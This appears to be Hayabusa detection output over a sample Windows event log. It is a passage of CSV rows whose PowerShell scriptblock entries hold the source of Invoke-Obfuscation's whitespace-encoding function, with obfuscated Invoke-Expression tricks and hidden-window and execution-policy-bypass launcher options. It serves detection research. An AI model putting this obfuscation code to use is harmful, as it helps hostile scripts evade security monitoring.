([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. 
ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) 
-Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. 
$ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. 
.PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. 
$IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random 
-Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. 
$NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. 
It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + 
"",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input 
@(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input 